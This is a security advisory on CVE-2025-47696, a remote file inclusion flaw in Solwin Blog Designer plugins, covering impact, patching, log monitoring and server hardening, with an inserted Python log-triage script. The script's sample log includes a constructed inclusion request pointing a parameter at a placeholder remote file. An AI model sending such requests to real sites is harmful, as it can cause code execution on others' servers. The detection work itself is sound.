CVE-2025-47696

Solwin · Solwin Blog Designer Multiple Products

A high-severity vulnerability has been identified in multiple Solwin Blog Designer products, including the PRO version.

Executive summary

A high-severity vulnerability has been identified in multiple Solwin Blog Designer products, including the PRO version. This flaw, known as a Remote File Inclusion (RFI), allows an unauthenticated attacker to trick the server into executing malicious code from an external source, potentially leading to a complete system compromise, data theft, and further network intrusion.

Vulnerability

The vulnerability is an Improper Control of Filename for Include/Require Statement in PHP, commonly known as Remote File Inclusion (RFI). This occurs when a PHP script uses a function like include() or require() to load a file whose path is provided via user-supplied input (e.g., a URL parameter) without proper validation. An attacker can exploit this by crafting a request that points to a malicious PHP script hosted on an external server. The vulnerable application will then fetch and execute this remote script, granting the attacker the ability to run arbitrary commands on the server with the permissions of the web server process.

Business impact

This vulnerability presents a significant risk to the organization, reflected by its High severity rating with a CVSS score of 8.1. Successful exploitation could lead to a complete compromise of the web server, resulting in severe consequences such as the theft of sensitive company or customer data, website defacement, and service disruption. Furthermore, a compromised server could be used as a pivot point to launch attacks against other internal systems or be co-opted into a botnet for malicious activities like distributing malware or launching denial-of-service attacks, causing significant reputational and financial damage.

Remediation

Immediate Action: The primary and most effective remediation is to apply the security updates provided by the vendor across all affected systems immediately. After patching, it is critical to review web server access and error logs for any signs of exploitation attempts that may have occurred prior to the update.

Proactive Monitoring: Security teams should actively monitor for indicators of compromise. This includes scrutinizing web server logs for suspicious GET or POST requests containing full URLs (e.g., http://, https://, ftp://) in parameters. Monitor network traffic for unusual outbound connections from the web server to unknown IP addresses, which could indicate the server is attempting to fetch a remote malicious file. Implement file integrity monitoring on the web application's directories to detect the creation of unexpected files (e.g., web shells).
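A small triage script for the log check just described, added here as an illustration and not part of the advisory or of any vendor tooling: it parses combined-format access log entries, decodes each query parameter, and reports those whose value is a full http, https or ftp URL. The log entries, plugin path, parameter names and addresses are constructed placeholders, not the real Blog Designer endpoint.

```python
import re
import urllib.parse
from typing import Dict, List

# Request-line fields of an Apache/nginx "combined" access log entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself a full URL with a remote-fetchable scheme.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

# Constructed sample entries; the plugin path, parameter names and
# addresses are placeholders, not the real Blog Designer endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [12/May/2025:10:01:02 +0000] "GET /wp-content/plugins/example-plugin/view.php?tpl=default HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/May/2025:10:01:07 +0000] "GET /wp-content/plugins/example-plugin/view.php?tpl=http://203.0.113.77/remote.txt HTTP/1.1" 200 91 "-" "curl/8.0"
198.51.100.3 - - [12/May/2025:10:02:11 +0000] "GET /index.php?redirect=https%3A%2F%2Fexample.com%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [12/May/2025:10:03:15 +0000] "POST /wp-login.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

def _decode(value: str) -> str:
    """Strip up to two layers of percent-encoding so an encoded URL is still seen."""
    for _ in range(2):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_url_params(log_text: str) -> List[Dict[str, str]]:
    """One finding per query parameter whose value is a remote URL.

    Only the query string is visible in an access log, so POST bodies are
    not covered; those need a WAF or request-body logging.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip blank or malformed entries rather than failing
        path, _, query = m.group('target').partition('?')
        for name, raw in urllib.parse.parse_qsl(query, keep_blank_values=True):
            value = _decode(raw)
            if REMOTE_URL_RE.match(value):
                findings.append({'time': m.group('ts'), 'ip': m.group('ip'),
                                 'path': path, 'param': name, 'value': value,
                                 'status': m.group('status')})
    return findings
```

Running find_remote_url_params(SAMPLE_LOG) flags the tpl= entry and the redirect= entry; the second is the kind of plausibly legitimate URL-carrying parameter that makes these matches leads for triage rather than verdicts, so pair them with the HTTP status and any outbound connection from the web server at the same time.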

Compensating Controls: If immediate patching is not feasible, implement the following controls to mitigate risk:

  • Deploy a Web Application Firewall (WAF) with rules specifically designed to detect and block RFI attack patterns.
  • On the server, set allow_url_include to Off in the php.ini configuration file. This is a critical server-level hardening step that prevents PHP from including remote files via URL. Note that allow_url_include defaults to Off and has been deprecated since PHP 7.4, so verify the effective value on each host (for example with php -i or phpinfo()) rather than assuming it, since a custom php.ini or an httpd.conf directive may still have enabled it.
  • Implement strict egress filtering rules on the network firewall to block the web server from initiating outbound connections to the internet, except to explicitly trusted hosts.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the high CVSS score of 8.1 and the critical impact of a successful Remote File Inclusion attack (i.e., remote code execution), this vulnerability should be treated with the highest priority. We strongly recommend that organizations identify all instances of the affected Solwin Blog Designer products and apply the vendor-supplied patches immediately. While this CVE is not currently listed on the CISA KEV list, its severity warrants urgent attention to prevent potential server compromise and subsequent data breaches.